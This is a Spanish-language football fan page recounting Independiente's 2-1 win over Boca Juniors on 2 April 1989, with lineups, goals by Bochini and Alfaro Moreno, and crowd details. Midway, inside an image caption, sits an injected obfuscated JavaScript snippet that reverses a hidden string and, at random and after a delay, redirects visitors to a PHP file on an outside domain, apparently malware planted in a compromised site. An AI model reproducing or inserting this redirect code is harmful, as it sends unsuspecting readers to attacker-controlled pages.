Conectate con nosotros

Efemérides

Efemérides del 02 de Abril

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1989 – ¡El partido del campeonato! Fue el que jugaron un día como hoy el local, Boca, frente a Independiente, por la fecha 29 de Torneo de Primera División 1988-1989. Y así lo entendieron los medios porque esa frase inicial es la que usaron en la previa del encuentro.

Boca era el líder en solitario (58), seguido por el Rojo a tres unidades. El antecedente inmediato era el de noviembre de 1988, cuando se vieron las caras en la fecha 10 y en la Doble Visera Independiente se impuso por 2 a 1 con los goles de Ricardo Bochini y Rogelio Delgado, siendo aquel primer gol el único que el “Bocha” llevaba anotado en el torneo. Además en esa ocasión, Boca también era puntero, y gracias al gran triunfo el Rojo siguió cerca de la cima de la tabla.

En todo ese contexto, las 65 mil personas presentes en la cancha, también entendieron lo trascendental que era el partido. Fue el segundo encuentro con mayor venta de entradas en la historia de la Bombonera, y antes de comenzar el juego, se dio una ovación a los ex combatientes de Malvinas a modo de homenaje por la fecha en cuestión.

El equipo del Rojo ese día fue: Eduardo Pereira; Néstor Clausen, Pedro Monzón, Rogelio Delgado y Guillermo Ríos; José Bianco, Miguel Ludueña, Rubén Insúa y Ricardo Bochini (69’ Pedro Massacessi); Martín Ubaldi (63’ Marcelo Morales) y Carlos Alejandro Alfaro Moreno, con Jorge Solari como D.T. Mientras que Boca lo hizo con: Navarro Montoya; Stafuza, Simón, Cuciuffo, Domenech (55’ Soñora); Carrizo, Marangoni, Tapia; Graciani, Perazzo y Barberón (45’ Latorre), siendo José Pastoriza el técnico.

Ya con la pelota en juego, Boca tuvo durante la primera parte varias acciones de peligro, pero el arquero Pereira se mostró inquebrantable, sosteniendo su arco en 0 con una notable actuación. El partido se fue mostrando cerrado y luchado, con unos primeros 20 minutos favorables a Boca y luego fue el Rojo el que se adueñó del trámite del juego. Ludueña y Bianco empezaron a controlar el mediocampo, mientras Bochini empezó a frotar su lámpara para hacer jugar a todos.

Así llegamos hasta el minuto 41, cuando Rubén Insúa recibe la pelota en la zona de la medialuna del área grande, se pone en rol de asistidor haciendo un pasebochinezcojustamente para el creador del término, dejándolo mano a mano con Navarro Montoya. El “Mono” sale rápido y le tapa el primer remate al “Maestro”, pero éste de arremetida y a lo guapo, captura el pequeño rebote y tocándola suave con la punta de su botín la manda al fondo del arco.

Nuevamente Bochini se convertía en el verdugo de Boca, era su segundo gol a dicho club y segundo que conseguía en el torneo (al final serían sus únicos 2 goles). Como en toda la década del 80, Bochini era clave en una victoria frente a Boca, convirtiéndose en su máximo verdugo de ese entonces y uno de los máximos que sufrieron en toda la historia.

Así se fueron al descanso, pero apenas al iniciarse la segunda etapa, la pelota le llega a Bochini sobre el sector derecho del ataque de Independiente. Sin siquiera parar el esférico, la toca suave por sobre el defensor que llegaba a marcarlo, sacándolo de su camino y ya entrando al área boquense. El “Bocha” se detiene, y hace un pase a ras de suelo hacia atrás para la llegada de Insúa, éste remata de primera pero el disparo es imperfecto y desviado, aunque en la trayectoria de la pelota aparece el “Beto” Carlos Alfaro Moreno, quien corrige la dirección de la pelota mandándola contra la red, siendo el 2 a 0.

De allí al final, Boca luchó y fue digno rival, pero Independiente fue superior y firme en todas sus líneas. En el ocaso del partido, cuando iban 90 minutos, Walter Perazzo logra el descuento para el 2 a 1 definitivo.

Fue un delirio absoluto en una Bombonera repleta, con el condimento de José Pastoriza como D.T. de Boca, Claudio Marangoni como número 5, y Alejandro Barberón en el ataque boquense. Fue dar el paso más grande hacia el título golpeando al candidato.

Fue otra vez Bochini arruinándoles la fiesta. Y en relación al “Maestro”, no hay que dejar pasar por alto un detalle del encuentro, que se dio cuando el DT Jorge “Indio” Solari decide sacarlo del campo.

En ese momento gran cantidad de hinchas de Boca se pusieron de pie, aplaudiendo una vez más al ídolo de Independiente, y digo una vez más porque ya había sucedido en 1987, con ovación absoluta para el “Bocha”, uno de los rivales más aplaudidos por la parcialidad boquense en toda la historia.

Independiente llegaba a la cima de la tabla (empatando a Boca), restando 9 fechas para terminar el torneo que lo tendría como campeón con un sprint final notable.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»75″ height=»58″/></figure></div>



<p>Les dejo <strong>video con lo mejor de aquel partido</strong>:</p>



<figure class=
https://www.youtube.com/watch?v=iI6ziX_R-QU&ab_channel=JuanAlbertoAricaMendoza

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides